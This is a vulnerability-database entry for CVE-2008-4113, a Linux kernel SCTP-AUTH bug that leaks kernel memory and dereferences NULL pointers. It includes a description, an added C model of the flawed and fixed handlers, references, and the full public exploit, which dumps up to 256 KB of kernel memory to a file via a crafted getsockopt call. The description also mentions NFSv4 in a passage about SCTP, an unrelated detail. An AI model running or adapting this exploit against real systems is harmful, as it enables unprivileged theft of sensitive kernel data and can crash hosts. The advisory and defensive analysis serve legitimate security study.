Multiple security vulnerabilities in the Linux kernel SCTP module

Vulnerability ID: 1117156    Vulnerability type: Information disclosure
Published: 2008-12-29    Updated: 2009-01-29
CVE ID: CVE-2008-4113    CNNVD ID: CNNVD-200809-230
Platform: Linux    CVSS score: 4.7
|Vulnerability sources
https://www.exploit-db.com/exploits/7618
https://cxsecurity.com/issue/WLB-2008090134
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200809-230
|Vulnerability details
Linux kernel is the kernel used by Linux, the open-source operating system released by the Linux Foundation (USA). The NFSv4 implementation is one of its distributed file system protocols. In the Linux kernel's SCTP implementation, net/sctp/socket.c does not verify that the SCTP-AUTH extension is enabled before proceeding with SCTP-AUTH API functions, which allows attackers to trigger a NULL pointer dereference by calling sctp_setsockopt_auth_chunk, sctp_setsockopt_hmac_ident, sctp_setsockopt_auth_key, sctp_setsockopt_active_key, sctp_setsockopt_del_key, sctp_getsockopt_maxburst, sctp_getsockopt_active_key, sctp_getsockopt_peer_auth_chunks or sctp_getsockopt_local_auth_chunks, resulting in a denial of service. When the SCTP-AUTH extension is enabled, the sctp_getsockopt_hmac_ident function in net/sctp/socket.c relies on an untrusted length value to limit the amount of data copied out of kernel memory, and the sctp_auth_ep_set_hmacs function in net/sctp/auth.c does not verify that identifier indexes lie within the range defined by SCTP_AUTH_HMAC_ID_MAX, which allows local attackers to obtain sensitive information via a crafted SCTP_HMAC_IDENT IOCTL request.
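The three defects described above (the missing SCTP-AUTH enable check, the caller-controlled copy length in the SCTP_HMAC_IDENT getsockopt path, and the unvalidated identifier range in the set path) can be modelled in user space to show what the corrected handlers must check. The following is an added example written for this page; it is not kernel code and not part of the original record or the exploit. All `MODEL_`/`model_` names, the constructed identifier values and the struct layouts are assumptions of the example and only approximate the kernel's `struct sctp_hmacalgo` and endpoint state.

```c
#include <errno.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed user-space model of the SCTP-AUTH HMAC_IDENT option handlers;
 * not kernel code. All "MODEL_"/"model_" names are assumptions of this
 * example and only approximate the kernel's types. */
#define MODEL_HMAC_ID_MAX 3     /* stands in for SCTP_AUTH_HMAC_ID_MAX */
#define MODEL_HMAC_SHA1   1     /* constructed identifier values */
#define MODEL_HMAC_SHA256 3

/* Per-endpoint AUTH state: whether the extension is on and which HMAC
 * identifiers are configured. */
struct model_endpoint {
    int auth_enable;
    uint16_t hmac_ids[MODEL_HMAC_ID_MAX];
    size_t num_hmac_ids;
};

/* Value handed back to the caller: a count followed by the identifiers
 * (shaped like struct sctp_hmacalgo). */
struct model_hmacalgo {
    uint32_t num_idents;
    uint16_t idents[];
};

/* Constructed block standing in for the kernel memory around the endpoint:
 * whatever follows the endpoint must never reach a caller. */
struct model_page {
    struct model_endpoint ep;
    unsigned char unrelated[64];
};

/* Setter: every identifier must lie in [1, MODEL_HMAC_ID_MAX] before it is
 * stored, so it can never become an out-of-range table index later. */
int model_set_hmacs(struct model_endpoint *ep, const uint16_t *ids, size_t n)
{
    size_t i;

    if (!ep->auth_enable)
        return -EACCES;
    if (n == 0 || n > MODEL_HMAC_ID_MAX)
        return -EINVAL;
    for (i = 0; i < n; i++)
        if (ids[i] == 0 || ids[i] > MODEL_HMAC_ID_MAX)
            return -EINVAL;
    memcpy(ep->hmac_ids, ids, n * sizeof(uint16_t));
    ep->num_hmac_ids = n;
    return 0;
}

/* "Before": the copy length comes from the caller. Everything from the HMAC
 * table up to len bytes later, including 'unrelated', is disclosed. The copy
 * is capped at the page only so the model itself stays memory-safe. */
size_t model_hmac_ident_unbounded(const struct model_page *pg,
                                  unsigned char *out, size_t len)
{
    size_t start = offsetof(struct model_page, ep) +
                   offsetof(struct model_endpoint, hmac_ids);
    size_t avail = sizeof(*pg) - start;

    if (len > avail)
        len = avail;
    memcpy(out, (const unsigned char *)pg + start, len);
    return len;
}

/* "After": refuse when AUTH is off (the kernel otherwise dereferenced a NULL
 * table), derive the copy length from the real data, and treat the caller's
 * length only as the capacity of the destination buffer. */
int model_hmac_ident_bounded(const struct model_endpoint *ep,
                             void *out, size_t *inout_len)
{
    size_t data_len, need;
    struct model_hmacalgo *alg = out;

    if (!ep->auth_enable)
        return -EACCES;
    if (ep->num_hmac_ids > MODEL_HMAC_ID_MAX)
        return -EINVAL;
    data_len = ep->num_hmac_ids * sizeof(uint16_t);
    need = sizeof(*alg) + data_len;
    if (*inout_len < need)
        return -EINVAL;         /* too small: fail rather than truncate silently */
    alg->num_idents = (uint32_t)ep->num_hmac_ids;
    memcpy(alg->idents, ep->hmac_ids, data_len);
    *inout_len = need;          /* report the real size, never the requested one */
    return 0;
}

int main(void)
{
    struct model_page pg;
    uint16_t ids[2] = { MODEL_HMAC_SHA1, MODEL_HMAC_SHA256 };
    unsigned char leak[64];
    uint64_t buf[8];            /* aligned destination for the bounded handler */
    size_t len = sizeof buf, got;

    memset(&pg, 0, sizeof pg);
    pg.ep.auth_enable = 1;
    memset(pg.unrelated, 0xAA, sizeof pg.unrelated);   /* constructed "secret" filler */
    model_set_hmacs(&pg.ep, ids, 2);

    got = model_hmac_ident_unbounded(&pg, leak, sizeof leak);
    printf("unbounded: copied %zu bytes, filler leaked: %s\n", got,
           memchr(leak, 0xAA, sizeof leak) ? "yes" : "no");
    printf("bounded: rc=%d, reported length %zu\n",
           model_hmac_ident_bounded(&pg.ep, buf, &len), len);
    return 0;
}
```

The bounded handler mirrors the shape of the upstream fix: the caller's length is only checked for sufficiency, the number of bytes copied is computed from the endpoint's own table, and the enable flag is tested before any table is touched. The model returns negative errno values the way a kernel setsockopt/getsockopt handler does.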
|Vulnerability exploit (EXP)
/*
 * cve-2008-4113.c
 *
 * Linux Kernel < 2.6.26.4 SCTP kernel memory disclosure
 * Jon Oberheide <jon@oberheide.org>
 * http://jon.oberheide.org
 * 
 * Information:
 *
 *   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4113
 *
 *   The sctp_getsockopt_hmac_ident function in net/sctp/socket.c in the Stream
 *   Control Transmission Protocol (sctp) implementation in the Linux kernel 
 *   before 2.6.26.4, when the SCTP-AUTH extension is enabled, relies on an 
 *   untrusted length value to limit copying of data from kernel memory, which 
 *   allows local users to obtain sensitive information via a crafted 
 *   SCTP_HMAC_IDENT IOCTL request involving the sctp_getsockopt function.
 *
 * Notes:
 *
 *   If SCTP AUTH is enabled (net.sctp.auth_enable = 1), this exploit allows an 
 *   unprivileged user to dump an arbitrary amount (DUMP_SIZE) of kernel memory
 *   out to a file (DUMP_FILE). If SCTP AUTH is not enabled, the exploit will 
 *   trigger a kernel OOPS.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/sctp.h>

#ifndef SCTP_HMAC_IDENT
#define SCTP_HMAC_IDENT 22
#endif

#define DUMP_SIZE 256*1024
#define DUMP_FILE "mem.dump"

int
main(int argc, char **argv)
{
	int ret, sock;
	FILE *dumpfile;
	char *memdump, *err;
	socklen_t memlen = DUMP_SIZE;

	memdump = malloc(DUMP_SIZE);
	if (!memdump) {
		err = "malloc(3) failed";
		printf("[-] Error: %s (%s)\n", err, strerror(errno));
		return 1;
	}
	memset(memdump, 0, DUMP_SIZE);

	printf("[+] creating IPPROTO_SCTP socket\n");

	sock = socket(PF_INET, SOCK_STREAM, IPPROTO_SCTP);
	if (sock == -1) {
		err = "socket(2) failed";
		printf("[-] Error: %s (%s)\n", err, strerror(errno));
		return 1;
	}

	printf("[+] getting socket option SCTP_HMAC_IDENT with length of %u\n", memlen);

	ret = getsockopt(sock, SOL_SCTP, SCTP_HMAC_IDENT, memdump, &memlen);
	if (ret == -1) {
		err = "getsockopt(2) failed";
		printf("[-] Error: %s (%s)\n", err, strerror(errno));
		return 1;
	}

	printf("[+] dumping %u bytes of kernel memory to %s\n", memlen, DUMP_FILE);

	dumpfile = fopen(DUMP_FILE, "wb");
	if (!dumpfile) {
		err = "fopen(3) failed";
		printf("[-] Error: %s (%s)\n", err, strerror(errno));
		return 1;
	}
	fwrite(memdump, 1, memlen, dumpfile);
	fclose(dumpfile);
	
	printf("[+] done.\n");

	return 0;
}

// milw0rm.com [2008-12-29]
|References

Source: XF
Name: kernel-sctpgetsockopthmac-info-disclosure (45188)
Link: http://xforce.iss.net/xforce/xfdb/45188
Source: UBUNTU
Name: USN-659-1
Link: http://www.ubuntu.com/usn/usn-659-1
Source: MISC
Link: http://www.trapkit.de/advisories/TKADV2008-007.txt
Source: SECTRACK
Name: 1021000
Link: http://www.securitytracker.com/id?1021000
Source: BID
Name: 31121
Link: http://www.securityfocus.com/bid/31121
Source: BUGTRAQ
Name: 20080911 [TKADV2008-007] Linux Kernel SCTP-AUTH API Information Disclosure Vulnerability and NULL Pointer Dereferences
Link: http://www.securityfocus.com/archive/1/archive/1/496256/100/0/threaded
Source: REDHAT
Name: RHSA-2008:0857
Link: http://www.redhat.com/support/errata/RHSA-2008-0857.html
Source: MLIST
Name: [oss-security] 20080926 Re: CVE-2008-4113 update: kernel: sctp: fix random memory dereference with SCTP_HMAC_IDENT option
Link: http://www.openwall.com/lists/oss-security/2008/09/26/6
Source: MILW0RM
Name: 7618
Link: http://www.milw0rm.com/exploits/7618
Source: www.kernel.org
Link: http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.26.4
Source: DEBIAN
Name: DSA-1655
Link: http://www.debian